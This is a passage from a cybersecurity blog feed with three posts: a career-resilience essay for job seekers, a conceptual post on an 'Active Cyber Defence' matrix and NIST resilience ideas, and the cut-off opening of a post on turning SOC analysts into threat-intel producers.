(Brian Klaas, <a href="https://www.forkingpaths.co/p/against-optimization">Against Optimization</a>)</p></div><h3>Resilience Tactic 2: Withstand. Tuning into Your Own Signal Amidst the Noise</h3><p>My fellow cyberscout, let me tell you this, you will find yourself entangled in the inevitable muddle: the silence, the polite dismissals, the impostor syndrome, the gaslighting, the lack of a voice echoing back at you.</p><p>At times, you will feel disconnected from the feedback loop that helps you stay on track. And you will get scarred. This is the desert of white noise, where you can't tell right from left, up from down.</p><p>There is not much you can do here other than resorting to your learned fundamentals. There is an i-ching theme that appears in a few hexagrams:</p><div class="pullquote"><p>"Perseverance furthers" (&#35998;&#21513;; zh&#275;n j&#237;)</p></div><p>Yeah I know, I'm flexing knowledge in "i-ching" which I don't really possess, and I sincerely apologise for the Chinese translation since I don't actually speak/write the language. But you get the point: perseverance pays off.</p><p>To persevere is to take the hit, to <strong>withstand</strong> it yes, but to allow that which temporarily harms you (a rejection letter, dismissive recruiters, ghosting, impostor syndrome, etc.) to teach you something about yourself and the environment around you. You don't want to remain immutable and unchanged. Seek a relationship with your context that re-connects you with that tight feedback loop you need to get past the obstacles.</p><div class="pullquote"><p><em>be water my friend (Bruce Lee)</em></p></div><p>To <strong>Withstand</strong> it's to maintain your own coherence, your <em>autopoiesis</em>, amidst the chatter and indifference. Keep your core rhythms going &#8211; the searching, the applying, the connecting &#8211; like tending a small, persistent fire. Never stop searching for kindling. Keep the fire going even if at times it looks like a pile of embers. Remember that embers are the seed of new fire.</p><p>When the inevitable &#8220;no&#8221; arrives (often cloaked in euphemism or simply absent), acknowledge the blip, the momentary dissonance (perhaps offer a silent, friendly scoff at the absurdity of it all?), but don't let it corrupt your core operating system. Observe these moments less as &#8220;failures&#8221; and more as the landscape revealing its contours, its preferences, its sometimes arbitrary gates. And those tactics yielding nothing? Gently set them aside, not as &#8220;failures&#8221;, but as paths that turned out to be loops or dead ends <em>for now</em>.</p><p>Stay operational, seek the aliveness of things, yes, but more importantly, stay <em>attuned</em> to your own energy and the subtle shifts in the field.</p><p>Learn, let the scar be your teacher.</p><h3>Resilience Tactic 3: Recover. Recalibrating in the Quiet Spaces</h3><p>Sometimes the signal degrades significantly; the noise becomes overwhelming. Simply withstanding isn't the move anymore. You need to <strong>Recover</strong>. This isn't surrender by the way. It's savvy navigation. Retreating momentarily from the arena to recalibrate.</p><p>A strategic pause, consciously taken, allows for integration and sense-making that's impossible when you're just reacting. When you re-engage, do it incrementally, feeling your way back into the flow, testing the currents.</p><p>Seek shelter my friend. This is the time to head over to your sacred grooves and sanctuaries. The time to talk to your elders, seek the wisdom of the ones who've been there before you. Connect to your friends. Talk, have fun. It's fine to ask for help. Heck it is more than fine, it is fundamental for thriving in the jungle.</p><p>Tend to your circles of conviviality. This is what being part of a clan and a tribe is. When you tend to the shared fire, you build resilience against the storms.</p><p>Around the fire, we tell stories. Allow yourself to revisit past chapters of your story not as proof points, but as reminders of your inherent capacity to navigate uncertainty. Seek dialogue (feedback) not just for data, but for reflection. Practice listening deeply to yourself and the environment.</p><p>When the territory is dynamic, presence becomes as important as vigilance.</p><p>How present are you?</p><h3>Resilience Tactic 4: Adapt. Strategy as a Living Conversation</h3><p>Trying the same failed exploit code over and over gets you what? You guessed it, the same results. This is where we <strong>Adapt</strong>. It&#8217;s the heart of navigating complexity, where strategy becomes less a fixed plan and more a living conversation with reality.</p><p>The <a href="https://cynefin.io/index.php/Main_Page">Cynefin Framework</a> reminds us that when in the complex domain, the best way to navigate is to <em>probe-sense-respond</em>. Adaptive response in deep connection to our environment.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!13BR!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ecece4e-276b-457a-a0ed-04bebdfc128c_2048x1152.webp" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!13BR!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ecece4e-276b-457a-a0ed-04bebdfc128c_2048x1152.webp 424w, https://substackcdn.com/image/fetch/$s_!13BR!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ecece4e-276b-457a-a0ed-04bebdfc128c_2048x1152.webp 848w, https://substackcdn.com/image/fetch/$s_!13BR!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ecece4e-276b-457a-a0ed-04bebdfc128c_2048x1152.webp 1272w, https://substackcdn.com/image/fetch/$s_!13BR!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ecece4e-276b-457a-a0ed-04bebdfc128c_2048x1152.webp 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!13BR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ecece4e-276b-457a-a0ed-04bebdfc128c_2048x1152.webp" width="1456" height="819" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5ecece4e-276b-457a-a0ed-04bebdfc128c_2048x1152.webp&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:819,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:61636,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/webp&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.quasarops.com/i/159888925?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ecece4e-276b-457a-a0ed-04bebdfc128c_2048x1152.webp&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!13BR!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ecece4e-276b-457a-a0ed-04bebdfc128c_2048x1152.webp 424w, https://substackcdn.com/image/fetch/$s_!13BR!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ecece4e-276b-457a-a0ed-04bebdfc128c_2048x1152.webp 848w, https://substackcdn.com/image/fetch/$s_!13BR!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ecece4e-276b-457a-a0ed-04bebdfc128c_2048x1152.webp 1272w, https://substackcdn.com/image/fetch/$s_!13BR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ecece4e-276b-457a-a0ed-04bebdfc128c_2048x1152.webp 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">The Cynefin Famework (https://thecynefin.co/about-us/about-cynefin-framework/)</figcaption></figure></div><p>Treat every interaction, every response (or lack thereof), as a subtle whisper or a loud clue from the system you're interacting with. In the context of threat intelligence, I always say that your environment emits and radiates valuable data that you could turn into intel. The information is there, your weaknesses, your attack surface, your risk profile, your priorities, the question is, are you listening? Are you turning that data into intel?</p><p>Use this unfurling of information to refine your approach &#8211; tweak the resume's narrative, adjust your conversational posture, explore different ways of showing up.</p><p>Cultivate a richer, more multifaceted presence. And if the path feels consistently blocked or just&#8230; wrong? Pivot. Gracefully. Explore adjacent territories. Look into the less obvious spaces where interesting things might be brewing. That message somebody left in your mailbox and you never replied to, that invitation to a gathering you never imagined yourself attending to, that colleague that is connected to wizards in the field, that sorceress that has some inexplicable magic surrounding her.</p><p>This isn't just about <em>staying dynami</em>c, it's about becoming an active participant in the generative dance, finding the rhythms, embracing the uncertainty of your situation not as a problem to be solved, but as the very medium through which new possibilities arise.</p><h2>So now what?</h2><p>I admit it, some of the things I shared here won't resonate with a lot of you out there. And that's fine. Because I accept my uniqueness. <em>I play in the in-between of memetics and antimemetics</em>. I don't parse well in some settings. RegEx for these words would turn into a recursive loop. And again, that's fine. Not everyone should grok this content. But there are gems to be found my fellow cyber scout, there are beautiful, deep coloured gems.</p><p>The more you accept the struggle and come up with creative ways to overcome obstacles, the more you accept that uncertainty and ambiguity are fundamental primitives of the journey, the more you will learn, course-correct, re-shape the neural pathways of your sense-making tradecraft in the world.</p><p>This will result in a more meaningful orientation and attunement with the experiences that bring joy to your life. And the more joyful you are, the more opportunities you will find.</p>]]></content:encoded></item><item><title><![CDATA[Active Defence Shenanigans]]></title><description><![CDATA[Or why the ways of old don't cut it anymore]]></description><link>https://www.quasarops.com/p/active-defence-shenanigans</link><guid isPermaLink="false">https://www.quasarops.com/p/active-defence-shenanigans</guid><dc:creator><![CDATA[Diego Perez]]></dc:creator><pubDate>Sun, 09 Mar 2025 04:50:40 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!d95G!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb98e4e45-c574-4875-9e64-383c3046cff3_981x972.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1>Understanding Active Cyber Defence Operations</h1><p>As you all know, I've been talking about Active Defence for quite a while, working hard to make sense of the problem space and bring some order to the concepts that haunt this thing we call "threat intel-led cyber defence" or "proactive cyber defence".</p><p><strong>But what is Active Defence Operations after all?</strong></p><h2>The Active Cyber Defence Matrix</h2><p>Active Defence Operations represents a fundamental paradigm shift in security, moving away from reactive approaches that inadvertently concede the initiative and tempo of engagement to adversaries.</p><p>Traditional security often lacks the dimension of <em>engagement</em>; Active Defence, in contrast, is rooted in the understanding that engagement with cyber threats is inevitable, and strategic advantage is gained through positional defence.</p><p>Operating within the adversarial engagement space, Active Defence encompasses two primary modes of engagement: discovery, focused on learning, observing, and detecting threats to gain insight; and disruption, centred on interception, containment, and eviction to neutralise threats. These two modes of engagement intersect with two other primitives that refer to the space, domain, or territory of engagement: external and internal. </p><p>The external territory designates everything outside your network perimeter, this includes not only the famous &#8220;threat landscape&#8221; or what is happening &#8220;out there&#8221; but also your business&#8217;s digital footprint that sits outside your direct network control (think user applications, ads, supply chain, vendor services, etc.). The internal territory designates all the digital systems inside your network. We could also add physical security considerations, but I will leave that for another time.</p><p>This approach shifts the security posture from simply reacting to actively positioning your assets and operations for predictively engaging threats.</p><p>Active Defence is more than what the industry currently <em>thinks</em> it is about, namely, cyber deception. <em>Deception is but one of many strategies to enact active defence in cyber operations</em>.</p><p>What I described above gives us the following matrix:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!d95G!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb98e4e45-c574-4875-9e64-383c3046cff3_981x972.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!d95G!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb98e4e45-c574-4875-9e64-383c3046cff3_981x972.png 424w, https://substackcdn.com/image/fetch/$s_!d95G!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb98e4e45-c574-4875-9e64-383c3046cff3_981x972.png 848w, https://substackcdn.com/image/fetch/$s_!d95G!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb98e4e45-c574-4875-9e64-383c3046cff3_981x972.png 1272w, https://substackcdn.com/image/fetch/$s_!d95G!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb98e4e45-c574-4875-9e64-383c3046cff3_981x972.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!d95G!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb98e4e45-c574-4875-9e64-383c3046cff3_981x972.png" width="981" height="972" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b98e4e45-c574-4875-9e64-383c3046cff3_981x972.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:972,&quot;width&quot;:981,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:90339,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.quasarops.com/i/155806878?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb98e4e45-c574-4875-9e64-383c3046cff3_981x972.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!d95G!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb98e4e45-c574-4875-9e64-383c3046cff3_981x972.png 424w, https://substackcdn.com/image/fetch/$s_!d95G!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb98e4e45-c574-4875-9e64-383c3046cff3_981x972.png 848w, https://substackcdn.com/image/fetch/$s_!d95G!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb98e4e45-c574-4875-9e64-383c3046cff3_981x972.png 1272w, https://substackcdn.com/image/fetch/$s_!d95G!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb98e4e45-c574-4875-9e64-383c3046cff3_981x972.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>Constraining the Engagement Space: Active Defense and the "Unknowns" Challenge</h2><p>Active Defense Operations, by emphasizing proactive engagement, directly addresses the challenge of &#8220;unknowns&#8221; by shifting from a purely reactive to a threat-led posture. As you know, <a href="https://www.quasarops.com/p/threat-hunting-breaking-habit-01">I don&#8217;t like the term</a> &#8220;unknown unknowns&#8221;, simply because it&#8217;s an empty concept. As Nassim Taleb puts it, <a href="https://fooledbyrandomness.com/ConvexityScience.pdf">one cannot systematize, formalize, and program randomness</a>. People talk about &#8220;unknown unknowns&#8221; when, in reality, they are thinking and referring to &#8220;known unknowns&#8221; or &#8220;unknown knowns&#8221;, which are less insurmountable and void-like ideas.</p><p>It&#8217;s better to simply talk in terms of &#8220;unknowns&#8221;, that&#8217;s it, single word. Because the truth is we are referring to <em>uncertainty</em>. We want to understand the <em>likelihood</em> of something and the impact it may carry. True &#8220;unknown unknowns&#8221; have an entropy of 1 (or say 100%), absolute randomness. What this implies is that in the face of absolute random events, you have very little power to influence the outcomes.</p><p>But security is about influencing outcomes. </p><p>While absolute randomness remains unquantifiable, active discovery within both internal and external engagement spaces <em>does</em> reduce the scope of uncertainty.</p><p>Active discovery is about intentionally delving into the noise, generating purposeful disruption.</p><p>This is precisely what we want to enact by engaging penetration testers and red teamers. They don't passively wait for vulnerabilities to be revealed; they actively probe APIs, networks, and systems, intentionally creating "noise" (e.g., sending malformed requests, attempting exploits) to observe the responses. This "purposeful disruption" allows them to map the attack surface, identify weaknesses, and reduce the initial high entropy by transforming unknowns into known vulnerabilities. Each successful probe, each identified misconfiguration, shifts the odds, making their subsequent actions more targeted and effective, ultimately increasing the likelihood of a successful breach or data exfiltration.</p><p>By actively mapping and understanding your external digital footprint and threat landscape, as well as your internal network, organizations constrain the engagement space, mitigating uncertainty and enabling more effective threat modeling.</p><p>This proactive approach, focused on both learning and disruption, builds resilience by anticipating and neutralizing threats before they manifest as catastrophic "unknowns", ultimately fostering a security posture that prioritizes continuous adaptation and operational continuity.</p><h2>The Learn-Act Cycle and Why Reactive Models Fail.</h2><p>There are two main actions in cyber defence: you either learn or you act. </p><p>Think OODA.</p><p>Effective cyber defense hinges on the strategic integration of learning and action. Traditional security paradigms, limited to reactive mitigation, operate within a singular action-oriented quadrant (upper left in our matrix).</p><p>This approach inherently precludes the critical acquisition and operationalisation of intelligence, resulting in a static and ultimately vulnerable posture.</p><p>Active Defense is a cyclical dynamic process: discovery, the intelligence, data and exposure gathering phase, and disruption, the active and reactive operational response. Discovery reduces uncertainty by actively probing and analyzing the threat landscape, while disruption either neutralizes identified threats (when you find yourself under a malicious cyber attack) or injects benign payloads via red/purple/pentest to make systems behave in non-intentional ways and reveal (discover) vulnerabilities.</p><p>By linking these phases, Active Defense operationalises continuous learning, enabling adaptive responses that outpace adversarial evolution. Reactive models, devoid of this feedback loop, remain fundamentally incapable of achieving <strong>sustained resilience</strong>.</p><h2><strong>Sustained Cyber Resilience</strong></h2><p>Resilient systems, as defined by NIST, transcend mere recovery; they embody the capacity to anticipate, withstand, adapt, and evolve. This aligns directly with the Active Defense paradigm, which emphasizes a continuous learn-act cycle guided by strategic positioning of assets and resources.</p><p>Here is the catch, though: you may be able to withstand and recover from an attack or two, but can you do it consistently? </p><p><em>Allow me the easy play of words: how resilient is your resilience?</em></p><p>Traditional reactive security models, with a high emphasis on the &#8220;Protect&#8221; and &#8220;Respond&#8221; NIST domains, inherently lack the adaptive capacity necessary for resilience.</p><p>Concepts like diversity, realignment, and unpredictability, as outlined in <a href="https://csrc.nist.gov/pubs/sp/800/160/v2/r1/final">NIST SP 800-160, Volume 2</a>, are operationalised within Active Defense through continuous monitoring, contextual awareness, and adaptive response. For instance, diversity reduces single points of failure, while realignment ensures security measures are aligned with evolving mission needs. Unpredictability, while seemingly random, can disrupt adversarial reconnaissance and attack planning. Unpredictability can be achieved by implementing strategic approaches like cyber deception.</p><p>Just as a biological system adapts to environmental pressures, a resilient cyber system, informed by active intelligence and operationalised through continuous learning and action, evolves to maintain essential functionality, even under persistent adversarial pressure.</p><p>So, how resilient are your cyber operations?</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://www.quasarops.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Thanks for reading Tales of a Cyberscout! Subscribe for free to receive new posts and support my work.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[Can your SOC become a Threat Intel Provider?]]></title><description><![CDATA[From drowning in alerts to producing intel, the SOC's journey. Ditch the grind, beyond alerts, produce intel. Transform your SOC into a strategic intel asset, boosting security and happiness. #SOC #Cybersecurity #ThreatIntel]]></description><link>https://www.quasarops.com/p/can-your-soc-become-a-threat-intel</link><guid isPermaLink="false">https://www.quasarops.com/p/can-your-soc-become-a-threat-intel</guid><dc:creator><![CDATA[Diego Perez]]></dc:creator><pubDate>Sun, 12 Jan 2025 07:16:37 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!wIJP!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8720e862-e823-4989-ac01-eac719d90e10_769x464.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!wIJP!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8720e862-e823-4989-ac01-eac719d90e10_769x464.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!wIJP!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8720e862-e823-4989-ac01-eac719d90e10_769x464.png 424w, https://substackcdn.com/image/fetch/$s_!wIJP!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8720e862-e823-4989-ac01-eac719d90e10_769x464.png 848w, https://substackcdn.com/image/fetch/$s_!wIJP!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8720e862-e823-4989-ac01-eac719d90e10_769x464.png 1272w, https://substackcdn.com/image/fetch/$s_!wIJP!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8720e862-e823-4989-ac01-eac719d90e10_769x464.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!wIJP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8720e862-e823-4989-ac01-eac719d90e10_769x464.png" width="769" height="464" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8720e862-e823-4989-ac01-eac719d90e10_769x464.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:464,&quot;width&quot;:769,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:58937,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!wIJP!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8720e862-e823-4989-ac01-eac719d90e10_769x464.png 424w, https://substackcdn.com/image/fetch/$s_!wIJP!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8720e862-e823-4989-ac01-eac719d90e10_769x464.png 848w, https://substackcdn.com/image/fetch/$s_!wIJP!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8720e862-e823-4989-ac01-eac719d90e10_769x464.png 1272w, https://substackcdn.com/image/fetch/$s_!wIJP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8720e862-e823-4989-ac01-eac719d90e10_769x464.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h1>I was once a SOC Analyst</h1><p>At the beginnings of my career in cybersecurity, I worked as a SOC analyst. This was an era when EDRs were not even a concept. Everything was just plain SIEM, raw logs, and vendors created most detection content. Detection Engineering was not even a <em>thing</em>.</p><p>I remember the days of the endless alerts queue, the countless false positives, the feeling of enthusiasm and the dizziness of overwhelming data streams.</p><p>I especially remember the many times <em>I thought I had just found</em> a surreptitious cyber attack. I would spend hours scavenging the internet for explanations to the data I was observing, correlating logs, talking to colleagues. Confirmation bias was tremendous. The deep excitement was palpable. The feeling that I had just found a reverse shell, a broad malware infection or hands-on-keyboard attacker activity.</p><p>I remember all the investigative work I did only to find out, with tenuous disappointment, that 95% of the time the source of observed malicious activity had a simple explanation: the client&#8217;s vulnerability scanner or a pentester.</p><p>Those were fun days. I looked at every sentence, word and character of a syslog entry or Windows Event Log with deep curiosity. I wanted to understand it all. My growth curve was off the charts.</p><p>But I also have very vivid memories of the toil, the grind, the neverending false positives. The feeling that I wasn&#8217;t contributing anything proactive to better protect the customers.</p><p>Security Analyst work can sometimes feel like being at the bottom of a cascade of alerts, trying to catch a speck of gold with your hands.</p><p>Turnover and burnout are high. Most of all at entry and mid-levels.</p><p>I&#8217;m sure many security analysts working at countless SOCs around the world can relate.</p><p>Over time though, I started to realise two things:</p><ol><li><p>Alerts are information. Specifically, information about your systems.</p></li><li><p>Most security analysts out there will perform several investigative steps 